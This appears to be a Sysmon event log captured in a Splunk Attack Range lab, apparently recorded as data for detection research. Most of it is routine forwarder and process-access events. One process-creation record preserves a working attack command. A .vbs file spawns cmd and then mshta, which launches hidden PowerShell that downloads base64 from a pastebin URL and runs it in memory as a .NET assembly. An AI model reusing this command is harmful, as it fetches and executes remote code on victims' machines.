Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=649293DC7EBB14288D5A3B01709F8E68,SHA256=E25A84B234C84A7BACB2A109C70184C1021B50EBC3D14E99B45DFD4AA04A8BA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082943Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:12.064{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73B991C6CA1A6A8148D60263727642A0,SHA256=9BE9EE4F20FB02F9F9E66DE7CB4BC87D276D831A0959D7A9B4BC68FDCF0FD651,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106212Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:12.310{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=020EF6C7BCD72257C097CA9618BFCA97,SHA256=A9CFDCE9B5C66C5EB17CF99794D164702A14DDF333C73BF53941B01994A53668,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106211Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:12.309{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=73EC02AEEC682368958EF4BD643BAC03,SHA256=034CC9C19610354331164C6C7EFA5250B821BCE7B21E41C736D98974C17EE3F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106215Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:13.937{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA71AE083058580EDB72CD197DBB36E5,SHA256=16F2B69845033052AACF531BF4EA16C1DC5BA5603F390BB1E8C8BCC92525D698,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082944Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:13.064{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84E9D0452F0C4553FD3FB575851F8ED9,SHA256=605D95EBF3AFDF4DCF522F2C0C44CABF1D9C0B034D34870EF6DE6566D7843B27,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106214Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:11.316{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51835-false10.0.1.12-8000- 23542300x8000000000000000106223Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:14.943{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=752348B1F04EF5FFAF3313A30AED638D,SHA256=0D331753650B1D78044F5DAD038E23D5AD9F7C1E9395125D0C1DB1CA2BE18CBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082945Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:14.065{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0CC3600B8FD787185DB801A09084028,SHA256=695DC5E40FE24C7540015533F2D69FB4861E0B86F6F904A8124F5817AFB88EB5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106222Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:14.558{58E9C193-AE68-615A-C800-00000000FC01}45484444C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106221Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:14.558{58E9C193-AE68-615A-C800-00000000FC01}45484444C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106220Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:14.558{58E9C193-AE68-615A-C800-00000000FC01}45484444C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106219Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:14.553{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106218Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:14.553{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106217Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:14.553{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106216Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:14.553{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106224Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:15.974{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F460E8AB6D4C0A6DF998B4EABF31EF26,SHA256=54367414748E709131F889DC627B2A5210F3F6857EB25891A8C113836EA52283,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082946Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:15.080{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19F48B65AC92C2492240CAE22B083B0D,SHA256=6F3883B009B9A08002B6C42F4515912617902F54382B16EDDEBB30B697C6D37B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106225Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:16.989{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABC9117A408EFEDAE2C4126F5BCDAE10,SHA256=6234591EE455591F85C2365BFBDDADBB3E932E7C754F7EFE7DF3F73327899465,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082948Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:13.650{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50130-false10.0.1.12-8000- 23542300x800000000000000082947Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:16.080{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C07719C49D385920B66E5383F963AF6C,SHA256=EDD89618788CC7768052CD8042FA51E6EB99A0B9289265B5AC392485144C8945,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106226Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:17.994{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=046F25F664C13DCFE91B743433AD9C33,SHA256=17A46179D438BD2DAFF24E20F78830207B49ED3B99E47D384A7DA8AD2136E7FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082949Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:17.085{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0A3FDF3C4FEFC8DB2CDBF96FE75B1B8,SHA256=5BEA63E8C243F1A63A8D35386B0389BCC8BAEF4BA70D5DFD1EB84EA93B4097FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106228Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:18.994{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41E9BDB4803CA4613C1A14201AF154BA,SHA256=A585940C4912A9DD8C3C0E750B82FB679EA3C0E67E8C47512723FF573A45DA48,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106227Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:17.314{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51836-false10.0.1.12-8000- 23542300x800000000000000082950Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:18.085{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F367D2BABB4AA2D7665CD5B336654B9A,SHA256=1BFBA48B1234ED32CF0E43D5AF3FD89E4FD3A179EE8D02BA3C3F104AE0AEDDB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082952Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:19.085{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43DA1C1C089EBC95154514DAFA4993EE,SHA256=58F654CA6376B55E85F39E415BEE83AFD419D8E9DFF748EDA7FB3B92DDAACDB9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106252Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.975{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B457-615A-1802-00000000FC01}2584C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106251Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.975{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106250Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.975{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106249Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.975{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B457-615A-1702-00000000FC01}1692C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106248Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.975{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106247Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.975{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106246Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.975{58E9C193-B457-615A-1602-00000000FC01}20002896C:\Windows\System32\WScript.exe{58E9C193-B457-615A-1702-00000000FC01}1692C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106245Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.980{58E9C193-B457-615A-1702-00000000FC01}1692C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/rQL02r6C').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000106244Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.975{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106243Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.975{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000106242Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.616{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\Temp.lnk2021-10-04 07:44:21.848 23542300x8000000000000000106241Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.616{58E9C193-AE68-615A-C800-00000000FC01}4548ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\Temp.lnkMD5=C01700A43B7EF0A1D5BCA1DE33F995BC,SHA256=7C51E1FA01364FDCE99B6EFB67559C66823127E4B68A8380761EEDAF568E31E9,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000106240Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.594{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\_______ _____ ___ ______ ______.vbs.lnk2021-10-04 07:44:21.816 23542300x8000000000000000106239Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.594{58E9C193-AE68-615A-C800-00000000FC01}4548ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\_______ _____ ___ ______ ______.vbs.lnkMD5=25C0795098145C448C6B0484CDC364C3,SHA256=BCF5994AE146D9A593981DC5371B02AF2D20D3C802A3E82C76F914A137149260,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106238Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 